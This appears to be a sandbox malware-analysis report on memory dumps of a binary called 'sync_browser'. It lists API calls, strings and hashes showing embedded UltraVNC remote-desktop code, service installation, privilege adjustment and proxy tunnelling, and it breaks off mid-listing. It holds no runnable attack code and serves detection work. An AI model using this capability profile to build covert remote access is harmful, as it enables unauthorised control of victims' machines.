Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
String ID: blackscreen
API String ID: 1419467151-1520931032
Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
Instruction ID: 4f0434e0a346d4d53ea20c5f20c50ae305b093099a95a9d8ae74f6f09382715d
Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
Instruction Fuzzy Hash: 5D81C933F2D68282FB708B14F401A7667AAAFA5744F480635FA5C866E5DF3DE549C700

Function 00007FF67E7F1CE0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 149COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7F1D13
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7F1F1B
InvalidateRect.USER32 ref: 00007FF67E7F1F73
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7F1F7F

Strings

vncdesktop.cpp : Shared memory mapped, xrefs: 00007FF67E7F1F56
vncdesktop.cpp : Start Mirror driver, xrefs: 00007FF67E7F1E33
Default, xrefs: 00007FF67E7F1CE0, 00007FF67E7F1CE1
vncdesktop.cpp : Start Mirror driver Failed, xrefs: 00007FF67E7F1E63
vncdesktop.cpp : Driver option is enabled, xrefs: 00007FF67E7F1D1A
vncdesktop.cpp : Closing pending driver driver version, xrefs: 00007FF67E7F1D39
vncdesktop.cpp : Driver Used, xrefs: 00007FF67E7F1F41
O, xrefs: 00007FF67E7F1D08
vncdesktop.cpp : Using non driver mode, xrefs: 00007FF67E7F1E78

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterInvalidateRect
String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
API String ID: 3829719269-2763606790
Opcode ID: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
Instruction ID: 8e9e8507278b95c38ec7d45f8b718b8b2a96765490f3da6218dbfb8e1289dc00
Opcode Fuzzy Hash: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
Instruction Fuzzy Hash: 73718E37A28A8285E744CF25D4446EC77B4FBA8F48F484536EA5D9B3A9CF3C9449CB10

Function 00007FF67E7D2D00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7D2FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D3009
Part of subcall function 00007FF67E7D2FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF67E7D3041

OpenSCManagerA.ADVAPI32 ref: 00007FF67E7D2D23
CreateServiceA.ADVAPI32 ref: 00007FF67E7D2DB6
GetLastError.KERNEL32 ref: 00007FF67E7D2DC4
CloseServiceHandle.ADVAPI32 ref: 00007FF67E7D2DFB

Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB

Strings

Failed to create a new service, xrefs: 00007FF67E7D2DDF
Failed to open service control manager, xrefs: 00007FF67E7D2D3C
Tcpip, xrefs: 00007FF67E7D2D53
UltraVNC, xrefs: 00007FF67E7D2D35, 00007FF67E7D2DE6
Failed: Permission denied, xrefs: 00007FF67E7D2DCF
uvnc_service, xrefs: 00007FF67E7D2D5A, 00007FF67E7D2D8E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
API String ID: 1695331641-1004021400
Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
Instruction ID: 525f3c090ca9f1fa3f80bdad4abf5c565f909c9da2b87864617a9b6e5e4ec109
Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
Instruction Fuzzy Hash: 92315E36A28A8282EB11DB14F8542B9B3A4FF68754F540035E98EC2664EF7DE59EC700

Function 00007FF67E7D93E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF67E7D9422
LoadLibraryA.KERNEL32 ref: 00007FF67E7D9437
GetProcAddress.KERNEL32 ref: 00007FF67E7D945B
CreateDCA.GDI32 ref: 00007FF67E7D9507
GetLastError.KERNEL32 ref: 00007FF67E7D9510
DeleteDC.GDI32 ref: 00007FF67E7D951E
FreeLibrary.KERNEL32 ref: 00007FF67E7D9537

Strings

mv video hook driver2, xrefs: 00007FF67E7D94C8
DISPLAY, xrefs: 00007FF67E7D94FA
EnumDisplayDevicesA, xrefs: 00007FF67E7D9449
USER32, xrefs: 00007FF67E7D9428

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
API String ID: 1846935786-1174184736
Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
Instruction ID: 03061c382011a2ed00193aa24bc06d1a726bbe5a10c2baa5cfd7c43bbf644e67
Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
Instruction Fuzzy Hash: 9A314F26B29A8295FB70DF25B8547AAA3A4FFA9744F940135EA4E87694DF3CD00DC700

Function 00007FF67E7E2650 Relevance: 18.4, APIs: 9, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E877BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF67E813771), ref: 00007FF67E877BFE

Part of subcall function 00007FF67E877BAC: _getptd.LIBCMT ref: 00007FF67E877BB4

rand.LIBCMT ref: 00007FF67E7E26B0

Part of subcall function 00007FF67E877BC4: _getptd.LIBCMT ref: 00007FF67E877BC8

rand.LIBCMT ref: 00007FF67E7E26B8
rand.LIBCMT ref: 00007FF67E7E26C4

Part of subcall function 00007FF67E7C5490: rand.LIBCMT ref: 00007FF67E7C54D2
Part of subcall function 00007FF67E7C5490: rand.LIBCMT ref: 00007FF67E7C54DA
Part of subcall function 00007FF67E7C5490: rand.LIBCMT ref: 00007FF67E7C54E6

rand.LIBCMT ref: 00007FF67E7E26F0
rand.LIBCMT ref: 00007FF67E7E26F8
rand.LIBCMT ref: 00007FF67E7E2704
rand.LIBCMT ref: 00007FF67E7E27DB
rand.LIBCMT ref: 00007FF67E7E27E3
rand.LIBCMT ref: 00007FF67E7E27EF

Strings

CheckUserGroupPasswordUni result=%i, xrefs: 00007FF67E7E2C3C
interKey larger than maxNum, xrefs: 00007FF67E7E29CA
After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u, xrefs: 00007FF67E7E2BD3

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: rand$Time_getptd$FileSystem
String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
API String ID: 3485648590-3000200491
Opcode ID: 1100013eedf7ebce8c619a49799bc30268fb9fae8f8c59135d25ae767e08c8be
Instruction ID: 4453ab6936f9dfb29db253d49b92711672b5d84bbe7c5dd7dec07d1fa28c070c
Opcode Fuzzy Hash: 1100013eedf7ebce8c619a49799bc30268fb9fae8f8c59135d25ae767e08c8be
Instruction Fuzzy Hash: 5DF11953B297D54AEB00C7B9A4102FC7FA09B92785F544076EF9D6BB9ADD2CD104C710

Function 00007FF67E7CC810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 366networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CC520: send.WS2_32 ref: 00007FF67E7CC56C

recv.WS2_32 ref: 00007FF67E7CC91C
recv.WS2_32 ref: 00007FF67E7CC9EC

Strings

Proxy-Authenticate:, xrefs: 00007FF67E7CC86F
CONNECT %s:%d HTTP/1.0, xrefs: 00007FF67E7CC895
Location: , xrefs: 00007FF67E7CCB83
basic, xrefs: 00007FF67E7CCAF2
WWW-Authenticate:, xrefs: 00007FF67E7CC837

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: recv$send
String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
API String ID: 1963230611-4083095726
Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
Instruction ID: 4d44eba54a25952f4e588ad45c325b5eada7518922650bd31975fc54866f7b3c
Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
Instruction Fuzzy Hash: 8EF1C523B2CB8641F7609B25E540279A79DEBA5794F542231FA4DD3AE5EF3CE50AC300

Function 00007FF67E882C70 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 00007FF67E882CB5
_set_error_mode.LIBCMT ref: 00007FF67E882CC6
GetModuleFileNameW.KERNEL32 ref: 00007FF67E882D28

Part of subcall function 00007FF67E884930: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67E8849D2), ref: 00007FF67E884948

GetStdHandle.KERNEL32 ref: 00007FF67E882E3D
WriteFile.KERNEL32 ref: 00007FF67E882E9A

Strings

Runtime Error!Program: , xrefs: 00007FF67E882CF5
Microsoft Visual C++ Runtime Library, xrefs: 00007FF67E882DE1
..., xrefs: 00007FF67E882D7A
<program name unknown>, xrefs: 00007FF67E882D37

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
Instruction ID: fe5bca8a16b039ecc3fc7c4196628f3a0c0d46822c698b1d0032745c24e076cf
Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
Instruction Fuzzy Hash: F351D123B3868285FB24D725A8116BAA395FFA5784F444235FE5D83B96DF3CE509C204

Function 00007FF67E7D70B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF67E7D70F4
LoadLibraryA.KERNEL32 ref: 00007FF67E7D7109
GetProcAddress.KERNEL32 ref: 00007FF67E7D712D
CreateDCA.GDI32 ref: 00007FF67E7D71D6
FreeLibrary.KERNEL32 ref: 00007FF67E7D71F2

Strings

mv video hook driver2, xrefs: 00007FF67E7D7198
DISPLAY, xrefs: 00007FF67E7D71C9
EnumDisplayDevicesA, xrefs: 00007FF67E7D711B
USER32, xrefs: 00007FF67E7D70FA

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
API String ID: 3702840025-1174184736
Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
Instruction ID: 2240407e9fc4df3f79e2642fca7153b67ac15beb2d97080478fed251adb49b77
Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
Instruction Fuzzy Hash: 9D31A326B2968295F770CB25F8547AAA3A4FBD9744F840135EE8E87B84EF3CD109C700

Function 00007FF67E7D18A0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF67E7D18B5
OpenProcess.KERNEL32 ref: 00007FF67E7D18C5
OpenProcessToken.ADVAPI32 ref: 00007FF67E7D18F5
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF67E7D190D
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF67E7D194D
GetLastError.KERNEL32 ref: 00007FF67E7D195B
CloseHandle.KERNEL32 ref: 00007FF67E7D196E
CloseHandle.KERNEL32 ref: 00007FF67E7D1977

Strings

SeTcbPrivilege, xrefs: 00007FF67E7D1904

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
String ID: SeTcbPrivilege
API String ID: 2450735924-1502394177
Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
Instruction ID: 88bac2945662a197f63a0cab317ce291374ca8f0fafa4818e34aff279a31304a
Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
Instruction Fuzzy Hash: 93215E62F28B4282FB50DF65E8051AAA3A4FFA9B54F440035FA4E86754EF7DD058CB00

Function 00007FF67E87DF80 Relevance: 15.3, APIs: 10, Instructions: 292timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF67E87DFAB

Part of subcall function 00007FF67E8877D0: _amsg_exit.LIBCMT ref: 00007FF67E8877FA

_get_daylight.LIBCMT ref: 00007FF67E87DFC1

Part of subcall function 00007FF67E88CEDC: _errno.LIBCMT ref: 00007FF67E88CEE5
Part of subcall function 00007FF67E88CEDC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E88CEF0

_get_daylight.LIBCMT ref: 00007FF67E87DFD6

Part of subcall function 00007FF67E88CE7C: _errno.LIBCMT ref: 00007FF67E88CE85
Part of subcall function 00007FF67E88CE7C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E88CE90

_get_daylight.LIBCMT ref: 00007FF67E87DFEB

Part of subcall function 00007FF67E88CEAC: _errno.LIBCMT ref: 00007FF67E88CEB5
Part of subcall function 00007FF67E88CEAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E88CEC0

___lc_codepage_func.LIBCMT ref: 00007FF67E87DFF8

Part of subcall function 00007FF67E880520: _getptd.LIBCMT ref: 00007FF67E880524

Part of subcall function 00007FF67E87945C: __wtomb_environ.LIBCMT ref: 00007FF67E87948C

free.LIBCMT ref: 00007FF67E87E069

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

free.LIBCMT ref: 00007FF67E87E0D2
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67E87E9A6,?,?,?,?,00007FF67E880706), ref: 00007FF67E87E0E5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67E87E9A6,?,?,?,?,00007FF67E880706), ref: 00007FF67E87E19B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67E87E9A6,?,?,?,?,00007FF67E880706), ref: 00007FF67E87E1EE

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
String ID:
API String ID: 2532449802-0
Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
Instruction ID: b2530087fcea9ac84bfff70d255300bc339720092c1549478c37aaf48834c152
Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
Instruction Fuzzy Hash: AAC19133B3828289E724DF65A54177AB795BFA5740F40413AFA8DC36A6DF3CE4198700

Function 00007FF67E88068C Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E8806AE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E8806BA
_errno.LIBCMT ref: 00007FF67E8806E4
__tzset.LIBCMT ref: 00007FF67E880701
_get_daylight.LIBCMT ref: 00007FF67E88070A
_get_daylight.LIBCMT ref: 00007FF67E88071B
